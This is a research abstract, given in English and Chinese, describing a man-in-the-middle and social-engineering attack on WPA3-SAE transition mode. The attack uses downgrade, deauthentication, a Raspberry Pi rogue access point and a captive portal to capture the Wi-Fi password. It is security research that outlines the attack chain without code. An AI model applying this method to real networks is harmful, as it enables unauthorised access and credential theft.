Wi-Fi Protected Access 3 (WPA3) is the accepted standard for next generation wireless security. WPA3 comes with exciting new features that allows for increased security of Wi-Fi networks. One such feature is the Simultaneous Authentication of Equals (SAE) which is a protocol whereby passphrases are hashed using a Password Authenticated Key Exchange with keys from both the Access Point and the Client making the password resistant to offline dictionary attacks. (Harkins, Dan. 2019) This objective of this research paper seeks to bypass WPA3-SAE to acquire network password via Man-in-the-Middle attack and Social Engineering. This method can prove to be useful given that majority of network attacks stem from social engineering. For this research we would be looking at the security of WPA3 personal transition mode and capture the network password via a captive portal. Breaching the WPA3 network can be possible by building on various security flaws that was disclosed on WPA3 in 2021. Due to the discovery of Dragonblood downgrade attacks disclosed in 2019, identified that WPA2/3Handshakes could be acquired. A Man in the Middle attack proposed set up is carried out by using race conditions to deauthentication WPA3 network and then using a Raspberry Pi to spawn a rouge WPA3 network. As such, the handshake acquired can then be utilized as to verify the password that would be entered in the captive portal of the rouge WPA3 network. This research identified that the Password was able to be recovered from Social Engineering Captive Portal when Protected Management Frames are not implemented. This research also indicates that some devices are not able to connect to a WPA 3 transition network which is contradicting the Wi-Fi Alliance claim that it is backwards compatible with WPA2.

翻译：Wi-Fi保护接入3（WPA3）是下一代无线安全的公认标准。WPA3引入了多项创新特性以增强Wi-Fi网络安全性，其中对等同步认证（SAE）协议通过接入点与客户端双方密钥进行密码认证密钥交换，对通行短语进行哈希处理，从而有效抵御离线字典攻击（Harkins, Dan. 2019）。本研究旨在通过中间人攻击与社会工程学相结合的方式突破WPA3-SAE防护以获取网络密码。鉴于多数网络攻击源于社会工程学，该方法具有显著实用价值。本研究聚焦WPA3个人过渡模式的安全性，通过强制门户捕获网络密码。基于2021年披露的WPA3多项安全缺陷，突破WPA3网络成为可能。2019年披露的龙血降级攻击表明可获取WPA2/3握手数据。本方案通过竞争条件实施WPA3网络解除认证，继而利用树莓派建立恶意WPA3网络以执行中间人攻击。所获握手数据可用于验证用户在恶意WPA3网络强制门户输入的密码。研究发现：在未实施受保护管理帧的情况下，可通过社会工程学强制门户成功恢复密码。同时，部分设备无法连接WPA3过渡网络，这与Wi-Fi联盟宣称的WPA2向后兼容性存在矛盾。